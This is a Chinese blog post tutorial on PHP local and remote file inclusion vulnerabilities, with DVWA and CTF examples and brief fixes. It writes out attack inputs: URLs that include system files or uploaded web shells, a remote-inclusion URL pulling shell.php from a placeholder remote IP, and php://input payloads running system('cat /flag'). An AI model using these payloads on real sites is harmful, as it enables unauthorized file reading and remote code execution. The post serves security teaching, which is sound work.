文件包含漏洞

于 2024-07-22 01:23:06 发布
阅读量451 收藏 12
点赞数 25
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74406055/article/details/135890558
版权

文件包含漏洞概念
php相关函数和伪协议
DVWA靶场案例演示
CTF题目案例
文件包含漏洞挖掘与利用
文件包含漏洞修复方案

文件包含漏洞概念

为什么要包含文件

包含内容 包含页头、页脚 包含函数 公共函数 减少重复代码、便于维护

问题

可能会导致允许访问敏感文件或者执行恶意代 码,造成漏洞

分类

1.本地文件包含 Local file Inclusion

(1).固定包含

fileinc/footer.php

fileinc/main.php

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

(2). 通过接口动态包含

http://localhost/fileinc/include.php?file= footer.php

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

(3).包含敏感文件

http://localhost/fileinc/include.php?file=C:\ Windows\system.ini

(4)包含恶意代码或图片马

http://localhost/fileinc/include.php?file=shell.php

http://localhost:7298/uploadlabs/include.php?file=upload/shell.gif

2.远程文件包含 Remote file inclusion

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

(1)配置 allow_url_fopen 和allow_url_include

(2)访问

http://localhost/fileinc/include.php?file=http://远程IP/1.txt

http://localhost/fileinc/include.php?file= http://远程IP/alert.html

http://localhost/fileinc/include.php?file= http://远程IP/shell.php

(3)CVE实际案例

http://cve.mitre.org/cgi-bin/cvekey.cgi? keyword=file+inclusion

php相关函数和伪协议

函数

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

伪协议

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

DVWA靶场案例演示

CTF题目案例

1.文件包含漏洞类型

若为POST传参则利用hackbar工具

参数ctfhub=system(‘ls’);

参数 ctfhub=system(‘find / -name flag*’); find命令,查询根目录下含有flag名的文件

参数 ctfhub=system(‘cat /flag’);

2.php://input伪协议类型---->实质就是把参数写为php代码,然后会执行

?file=php://input

参数<?php system('ls /'); ?>

参数 <?php system('cat /flag_16571'); ?>

补充php://协议

条件:不需要开启allow_url_fopen,仅php://input、 php://stdin、 php://memory 和 php://temp 需要开启allow_url_include。

php:// 访问各个输入/输出流(I/O streams)

CTF中经常使用的是php://filter和php://input,php://filter用于读取源码,php://input用于执行php代码。php://filter 读取源代码并进行base64编码输出,不然会直接当做php代码执行就看不到源代码内容了

其他可参考这篇博客文章

https://www.cnblogs.com/zzjdbk/p/13030717.html

文件包含漏洞挖掘与利用

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

文件包含漏洞修复方案

1、PHP配置

2、禁用动态包含

3、过滤协议、目录字符

4、设置文件白名单

求知若渴_ˇ
关注
  • 25
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件包含漏洞全面详解
m0_46467017的博客
08-17 6万+
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。...
文件包含漏洞实战
yuan_boss的博客
08-31 1329
可以看到,我们成功获取到了hosts文件,但是这并不能证明是文件包含漏洞,因为这仅仅是把hosts文件读取出来了,最多能确定的是文件读取漏洞,所以我们可以写一个把phpinfo.php放到www的一个目录中,我们尝试访问phpinfo.php,看看能否解析成功,解析成功了就说明是文件包含漏洞。我们仅仅可以使用文件包含漏洞,这个时候就需要考虑到php的一些封装协议了,利用封装协议,可以读取PHP文件源码,可以执行PHP命令。由上面的结果可知,我们利用php://input成功执行了php的命令。
文件包含漏洞详解
剁椒鱼头没剁椒的博客
12-01 4187
文件包含漏洞就是使用函数去包含任意文件的时候,当包含的文件来源过滤不严谨的时候,当存在包含恶意文件后,就可以通过这个恶意的文件来达到相应的目的。file : // #访问本地文件系统 http : // #访问HTTPs网址 ftp : // #访问ftp URL php : // #访问输入输出流 zlib : // #压缩流 data : // #数据 ssh2 : // #security shell2 expect : // #处理交互式的流 glob : // #查找匹配的文件路径。
文件包含漏洞-02】文件包含漏洞原理、简单测试实例以及空字符绕过实例
m0_64378913的博客
06-15 3028
概述:文件包含漏洞:即file inclusion,意思是文件包含,是指当服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。定义:随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的
08_理论8_文件包含漏洞的原理与实践_20180921
02-10
### 文件包含漏洞的原理与实践 #### 一、文件包含漏洞概述 文件包含漏洞是一种常见的Web应用程序安全漏洞,尤其在使用PHP语言开发的应用程序中较为普遍。这种漏洞允许攻击者通过控制程序中用于指定要包含文件的...
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
web 网站文件包含漏洞和攻击-运维安全详细笔记总结 文件包含漏洞是指攻击者通过上传恶意文件,利用服务器的文件包含功能来执行恶意代码,从而获取服务器的控制权。文件包含漏洞可以分为本地文件包含漏洞和远程文件...
通达OA v11.8 getway.php 远程文件包含漏洞.md
09-07
通达OA漏洞合集
Web应用安全:文件包含漏洞简介.pptx
06-18
文件包含漏洞是Web应用安全领域中的一个重要话题,它主要源于开发者在编程时为了代码复用而采用的文件包含机制。这种机制允许程序动态地加载和执行存储在不同文件中的代码,但同时也为攻击者提供了可乘之机。下面将...
Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938)
03-05
CNVD-2020-10487 和 CVE-2020-1938 是同一个安全漏洞的不同命名,这个漏洞被称为“Apache Tomcat 文件包含漏洞”。此漏洞的存在使得攻击者有可能通过精心构造的请求,将恶意代码注入到Tomcat服务器上,从而执行任意...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8358
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
QT5 FTP 客户端 实现多文件下载 上传
08-01
QT5 FTP 客户端 实现多文件下载 上传
MATLAB车牌识别实现车牌定位仿真系统(可运行)
08-01
车牌定位分为以下步骤: 图像预处理:读取图像并对其进行预处理,例如灰度化、降噪和增强等。 车牌区域定位:使用图像处理技术,例如边缘检测、连通区域检测和形态学操作等,找到车牌的大致位置。 车牌区域精确定位:通过进一步的图像处理技术,例如投影、边缘检测和形态学操作等,对车牌区域进行精确定位。 字符分割:将车牌区域中的字符进行分割,形成单独的字符图像。 字符识别:使用字符识别算法,例如模板匹配、神经网络或支持向量机等,对分割的字符进行识别。 本设计非常适合新手学习使用,进阶研究等二次开发。欢迎大家多多下载交流学习研究。
年度销售回款计划表(依据项目回款率制定,月度分解.xlsx
最新发布
08-01
销售统计,调查问卷,库存明细,跟进表,业绩统计表,差异分析 ,产品清单 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
步控中文编程软件+视频教学案例+国产PLC控制器+中文编程PLC+中文PLC+步控PLC+中文控制器
08-01
中文表格式编程软件,无需使用复杂的编程语言,低代码编程,快速入门,功能模块化。 零基础:软件是全中文表格式界面,不需要懂英文代码,完全可以做到零基础使用,像工厂里的电工、装配工都可以直接上手。 降成本:软件可以给标准的控制器编写程序,还可以给批量生产的设备定制开发板,大大降低设备成本。 无门槛:软件使用底层程序做好的功能模块,直接调用即可,程序单一性,调试修改方便。
Transformer
08-01
transformer视频
探索工业自动化的艺术:CODESYS中的高级图形与动画效果实现
08-01
CODESYS是一个可编程逻辑控制器(PLC)的完整开发环境,是Controlled Development System的缩写。它为IEC语言提供了一个简单的编程方法,具有类似于高级编程语言的编辑器和调试器功能,例如Visual C++。CODESYS软件可以编辑显示器界面,具有控制模块,可以放置图片等强大功能 。最新版本是CODESYS V3,它在软件架构上有很大改善,正在申请TUV关于EN 61508的SIL认证 。 CODESYS软件集团专注于工业智能技术、PLC控制器编程开发工具包套件、复杂运动控制及数字化工厂解决方案的研发、销售和技术服务。它基于.NET架构和IEC 61131-3国际编程标准,提供开发PLC控制器的完整解决方案 。 CODESYS软件分为Development System和Runtime System两部分。Development System是编程界面,用于设计、调试和编译PLC程序;Runtime System是程序运行的软件环境,通常安装在硬件设备上。CODESYS Runtime具有强大的适应性,支持大多数操作系统和硬件芯片架构 。 此外,
蛇群算法SO优化Transformer-LSTM负荷数据回归预测【含Matlab源码 6400期】.zip
08-01
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法优化Transformer-LSTM预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO优化Transformer-LSTM预测 4.4.2 粒子群算法PSO/蛙跳算法SFLA优化Transformer-LSTM预测 4.4.3 灰狼算法GWO/狼群算法WPA优化Transformer-LSTM预测 4.4.4 鲸鱼算法WOA/麻雀算法SSA优化Transformer-LSTM预测 4.4.5 萤火虫算法FA/差分算法DE优化Transformer-LSTM预测 4.4.6 其他优化算法优化Transformer-LSTM预测
1978-2022年中国各省恩格尔系数和泰尔指数面板数据(全新整理)
08-01
1、资源内容地址:https://blog.csdn.net/2301_79696294/article/details/140409021 2、代码特点:今年全新,手工精心整理,放心引用,数据来自权威,相对于其他人的控制变量数据准确很多,适合写论文做实证用 ,不会出现数据造假问题 3、适用对象:大学生,本科生,研究生小白可用,容易上手!!! 3、课程引用,经济学,地理学,城市规划与城市研究,公共政策与管理,社会学,商业与管理 数据指标说明 一、1978-2022各省份城镇与农村恩格尔系数 二、1978-2022各省份泰尔指数等数据 1、1978-2022各省份泰尔指数 2.泰尔指数模型stata全流程代码+数据+文献 3、泰尔指数计算模板
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值